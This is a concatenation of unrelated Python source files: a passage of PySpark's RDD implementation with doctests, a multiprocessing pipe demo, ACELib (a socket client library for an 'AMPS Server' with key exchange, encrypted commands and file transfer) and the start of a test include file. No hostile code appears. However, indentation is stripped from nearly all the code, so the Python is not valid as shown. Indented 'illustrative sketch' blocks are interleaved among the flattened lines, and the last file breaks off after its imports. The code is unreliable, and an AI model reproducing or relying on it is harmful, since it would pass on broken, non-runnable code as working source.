Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def topNKeyedElems(iterator, key_=None):
q = MaxHeapQ(num)
for k in iterator:
if key_ is not None:
k = (key_(k), k)
q.insert(k)
yield q.getElements()
def unKey(x, key_=None):
if key_ is not None:
x = [i[1] for i in x]
return x
def merge(a, b):
return next(topNKeyedElems(a + b))
result = self.mapPartitions(
lambda i: topNKeyedElems(i, key)).reduce(merge)
return sorted(unKey(result, key), key=key)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and using the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.partitions().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the first iteration, just
# try all partitions next. Otherwise, interpolate the number
# of partitions we need to try, but overestimate it by 50%.
if len(items) == 0:
numPartsToTry = totalParts - 1
else:
numPartsToTry = int(1.5 * num * partsScanned / len(items))
left = num - len(items)
def takeUpToNumLeft(iterator):
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(
partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
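# A standalone sketch (illustrative only) of the partition-scan growth rule
# used by take() above: after the first pass, either jump to all remaining
# partitions (if nothing was found) or interpolate how many more partitions
# to scan, overestimating by 50%.
def _num_parts_to_try_sketch(num, partsScanned, itemsFound, totalParts):
    if partsScanned == 0:
        return 1
    if itemsFound == 0:
        return totalParts - 1
    return int(1.5 * num * partsScanned / itemsFound)
# Example: asking for num = 100 after finding 10 items in 1 scanned partition
# suggests trying int(1.5 * 100 * 1 / 10) == 15 partitions next.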
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
"""
return self.take(1)[0]
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
self._reserialize(BatchedSerializer(PickleSerializer(),
batchSize))._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
yield x.encode("utf-8")
keyed = PipelinedRDD(self, func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for (k, v) in iterator:
m[k] = v if k not in m else func(m[k], v)
yield m
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] = v if k not in m1 else func(m1[k], v)
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in other have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as the default, because the builtin hash of None
# differs across machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
# Transferring O(n) objects to Java is too expensive. Instead, we'll
# form the hash buckets in Python, transferring O(numPartitions) objects
# to Java. Each object is a (splitNumber, [objects]) pair.
outputSerializer = self.ctx._unbatched_serializer
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
for (k, v) in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
for (split, items) in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = PipelinedRDD(self, add_shuffle_key)
keyed._bypass_serializer = True
with _JavaStackTrace(self.context) as st:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique, even if
# partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
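# A standalone sketch (illustrative only) of the Python-side bucketing that
# add_shuffle_key performs above: each (key, value) pair is routed to bucket
# portable_hash(key) % numPartitions, so only numPartitions bucket lists have
# to cross the Py4J boundary instead of one object per record.
def _hash_bucket_sketch(pairs, numPartitions):
    from collections import defaultdict
    buckets = defaultdict(list)
    for (k, v) in pairs:
        buckets[portable_hash(k) % numPartitions].append((k, v))
    return dict(buckets)
# Example: _hash_bucket_sketch([("a", 1), ("b", 2), ("a", 3)], 2) always puts
# both ("a", ...) pairs in the same bucket, which is what partitionBy needs.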
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
def combineLocally(iterator):
combiners = {}
for x in iterator:
(k, v) = x
if k not in combiners:
combiners[k] = createCombiner(v)
else:
combiners[k] = mergeValue(combiners[k], v)
return combiners.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
combiners = {}
for (k, v) in iterator:
if k not in combiners:
combiners[k] = v
else:
combiners[k] = mergeCombiners(combiners[k], v)
return combiners.iteritems()
return shuffled.mapPartitions(_mergeCombiners)
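# A standalone sketch (illustrative only) of the per-partition half of
# combineByKey above: the first value seen for a key is turned into a
# combiner with createCombiner, and every later value is folded in with
# mergeValue.
def _combine_locally_sketch(pairs, createCombiner, mergeValue):
    combiners = {}
    for (k, v) in pairs:
        if k not in combiners:
            combiners[k] = createCombiner(v)
        else:
            combiners[k] = mergeValue(combiners[k], v)
    return combiners
# Example: _combine_locally_sketch([("a", 1), ("b", 1), ("a", 1)], str,
#                                  lambda c, v: c + str(v))
# returns {'a': '11', 'b': '1'}, matching the combineByKey doctest above.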
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's. The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey will provide much
better performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
return a + b
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
# TODO: add tests
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1]), list(y[2]), list(y[3])))), \
sorted(list(w.groupWith(x, y, z).collect())))
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom partitioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func((key, vals)):
return len(vals[0]) > 0 and len(vals[1]) == 0
map_func = lambda (key, vals): [(key, val) for val in vals[0]]
return self.cogroup(other, numPartitions).filter(filter_func).flatMap(map_func)
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd).map(lambda tpl: tpl[0])
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs consisting of the
first element in each RDD, the second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if not name_:
return None
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1')
>>> rdd1.name()
'RDD1'
"""
self._jrdd.setName(name)
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if not debug_string:
return None
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
command = (self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer)
pickled_command = CloudPickleSerializer().dumps(command)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
self.ctx._gateway._gateway_client)
self.ctx._pickled_broadcast_vars.clear()
class_tag = self._prev_jrdd.classTag()
env = MapConverter().convert(self.ctx.environment,
self.ctx._gateway._gateway_client)
includes = ListConverter().convert(self.ctx._python_includes,
self.ctx._gateway._gateway_client)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_command),
env, includes, self.preservesPartitioning,
self.ctx.pythonExec,
broadcast_vars, self.ctx._javaAccumulator,
class_tag)
self._jrdd_val = python_rdd.asJavaRDD()
return self._jrdd_val
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
pipe_20_3_2.py
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
""" Inter-process communication using a pipe.
The read end and the write end are similar to socket endpoints:
each end can both read and write.
"""
import multiprocessing
def consumer(pipe):
read_p, write_p = pipe
write_p.close() # close the write end of the pipe in the consumer
while True:
try:
item = read_p.recv()
except EOFError:
break
print(item)
print('Consumer done')
def producer(seq, write_p):
for item in seq:
write_p.send(item)
if __name__ == '__main__':
(read_p, write_p) = multiprocessing.Pipe()
# Consumer process
cons_p = multiprocessing.Process(target=consumer, args=((read_p, write_p),))
cons_p.start()
# Close the read end in the parent process
read_p.close()
seq = range(100)
producer(seq, write_p)
# Production finished: close the producer's write end.
# Otherwise the consumer would block forever in recv() (important)
write_p.close()
# Wait for the consumer to finish
cons_p.join()
print('Main process over')
|
ACELib.py
|
"""
ACELib (AMPS Client Environment Library)
A library to allow any process to supply data to an official AMPS Server
"""
import socket
import json
import base64
import hashlib
import threading
import keyExchange
import encryption
import packet as Packet
import dataOverString as DataString
import ACEExceptions as ACEE
class Connection:
"""
Connection class wraps the connection to an AMPS Server
"""
def __init__(self, host="127.0.0.1", port=4242):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.host = host
self.port = port
self.key = 0
self.callBacks = {}
def connect(self):
"""
Connects to the AMPS Server and initializes the connection
"""
self.socket.connect((self.host, self.port))
def recievePacketVerify(self, encrypted=False):
"""
Gets a packet from the server, and verifies it is of the correct
format
"""
if not encrypted:
rawPacketData = Packet.readPacket(self.socket)
if not rawPacketData.endswith("-ENDACROFTPPACKET-/"):
raise ACEE.BadPacketException("Corrupted Packet")
rawPacketData = rawPacketData[:-19]
else:
encryptedPacket = Packet.readPacket(self.socket)
if not encryptedPacket.endswith("-ENDACROFTPPACKET-/"):
raise ACEE.BadPacketException("Corrupted Packet")
encryptedPacket = encryptedPacket[:-19]
jsonPart = json.loads(encryptedPacket)["payload"]
rawPacketData = encryption.decrypt(jsonPart, self.key)
rawPacketData = "".join(rawPacketData)
packetDataJSON = json.loads(rawPacketData)
return packetDataJSON
def recievePacketType(self, packetType,
exception=ACEE.BadPacketTypeException(),
encrypted=False):
"""
Gets a packet from the server, and checks that it is of the
correct type
"""
packet = self.recievePacketVerify(encrypted)
if packet['packetType'] == packetType:
return packet
raise exception
def handshake(self):
"""
Performs the standard handshake with an AMPS Server
"""
packet = self.recievePacketVerify()
if packet['packetType'] == '__HDS__' and packet['payload'] == '31415':
Packet.Packet('31415', "__HDS__").send(self.socket)
else:
raise ACEE.BadHandshakeException("Handshake not formated well")
def getKey(self):
"""
Performs the other half of the key exchange, resulting in the
sharing of keys between the AMPS Server and client
"""
primeError = (ACEE.
BadPacketTypeException("Prime Packet has Bad Type"))
mixedError = (ACEE.BadPacketTypeException("Mixed Secret has Bad Type"))
primePacket1 = self.recievePacketType('__DAT__', primeError)
primePacket2 = self.recievePacketType('__DAT__', primeError)
primePacketData1 = primePacket1['payload'][2:]
primePacketData2 = primePacket2['payload'][2:]
primes = [DataString.convertDataToInt(primePacketData1),
DataString.convertDataToInt(primePacketData2)]
exchange = keyExchange.KeyExchange(primes)
exchange.randomSecret()
mixed = exchange.calculateMixed()
otherMixedPacket = self.recievePacketType('__DAT__', mixedError)
otherMixed = (DataString.
convertDataToInt(otherMixedPacket['payload'][2:]))
key = exchange.getSharedKey(otherMixed)
mixedPacket = Packet.Packet("00" + DataString.convertIntToData(mixed))
mixedPacket.send(self.socket)
return key
def initConnection(self):
"""
Does the initialization of the connection with the server:
the connection itself, the handshake, and the key exchange
"""
self.connect()
self.handshake()
self.key = self.getKey()
def sendEncrypted(self, packetBody, packetType):
"""
Sends encrypted data over the connection
"""
Packet.Packet(encryption.encrypt(packetBody, self.key),
packetType).send(self.socket)
def sendEncryptedDict(self, dictionary, dataType):
"""
Converts a dictionary to a JSON object, and sends that over an
encrypted connection
"""
jsonObject = json.dumps(dictionary)
self.sendEncrypted(jsonObject, dataType)
def setData(self, name, value, dataType="str"):
"""
Sets data in the cache on the server
Specifically, sets the data under name to value
"""
self.sendEncryptedDict({"CMDType": "setData",
"name": name,
"value": value,
"dataType": dataType}, "__CMD__")
def getData(self, name):
"""
Gets data by name from the server
"""
self.sendEncryptedDict({"CMDType": "getData",
"name": name}, "__CMD__")
data = self.recievePacketType("__DAT__", encrypted=True)
return data["payload"]
def loginServer(self, username, password):
"""
Starts the login process with the AMPS server
"""
password = hashlib.sha3_256(password.encode()).hexdigest()
self.sendEncryptedDict({"CMDType": "login",
"data": {"username": username,
"password": password}},
"__CMD__")
result = self.recievePacketVerify(encrypted=True)
return result["data"]
def downloadFile(self, fileName, fileObject):
"""
Downloads the file with the given filename on the server,
and writes it to the file object stored in fileObject (which must be
opened in binary mode)
"""
self.sendEncryptedDict({"CMDType": "downloadFile",
"data":{"filePath": fileName,
"windowID": -42,
"filePathModifier":""}}, "__CMD__",)
encryptedData = "".join(Packet.getPacket(self.socket)['payload'])
data = json.loads("".join(encryption.decrypt(encryptedData, self.key)))["payload"]["file"]
fileObject.write(base64.b64decode(data))
def runLibraryFunction(self, libraryName, functionName, arguments):
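"""
Runs the named function from the named library on the AMPS Server,
passing it the given arguments
"""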
self.sendEncryptedDict({"CMDType": "libraryFunction",
"data":{"library": libraryName,
"function": functionName,
"arguments":arguments}}, "__CMD__",)
def uploadFile(self, fileObject, fileName):
"""
Uploads the data from the fileObject and stores it in the file
designated by fileName
"""
self.sendEncryptedDict({"CMDType": "uploadFile",
"data":{"filePath": fileName,
"index": 0,
"file":base64.b64encode(
fileObject.read()
).decode("ascii")}}, "__CMD__")
def addListener(self, key, callBack):
"""
Adds an event listener on the server for updates to the variable named by
key. When it is updated, callBack will be called with
two parameters, the first being the new value, and the second the old
value.
"""
self.callBacks[key] = callBack
self.sendEncryptedDict({"CMDType": "subscribeToEvent",
"data":{"dataTitle": key}}, "__CMD__")
def _listener(self):
generator = Packet.fullGenerator(self.socket)
while True:
packet = json.loads("".join(encryption.
decrypt(next(generator)['payload'],
self.key)))
self.callBacks[packet["payload"]["key"]](
packet["payload"]["newValue"],
packet["payload"]["oldValue"])
def startListener(self):
"""
Starts the event loop. Although this runs in a separate thread and code
can be run after this is called, it is still recommended to call this
at the end of a file.
"""
threading.Thread(target=self._listener, args=()).start()
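# A minimal usage sketch (illustrative only): it assumes an AMPS Server is
# listening on the default host/port and that "user"/"password" are valid
# credentials; all of these are placeholders, not values from this library.
def _example_session():
    conn = Connection()                # defaults to 127.0.0.1:4242
    conn.initConnection()              # connect, handshake, key exchange
    conn.loginServer("user", "password")
    conn.setData("greeting", "hello")
    print(conn.getData("greeting"))
    # React to later updates of "greeting" made by other clients:
    conn.addListener("greeting", lambda new, old: print(new, old))
    conn.startListener()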
|
includes.py
|
import json
import os
import random
import sys
import time
from multiprocessing import Process
import threading
import redis
from numpy.random import default_rng
import numpy as np
from skimage.io import imread
from skimage.transform import resize
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../opt/readies"))
import paella
ROOT = os.environ.get("ROOT", None)
TESTMOD_PATH = os.environ.get("TESTMOD", None)
MAX_ITERATIONS = 2 if os.environ.get("MAX_ITERATIONS") is None else int(os.environ.get("MAX_ITERATIONS"))
TEST_TF = os.environ.get("TEST_TF") != "0" and os.environ.get("WITH_TF") != "0"
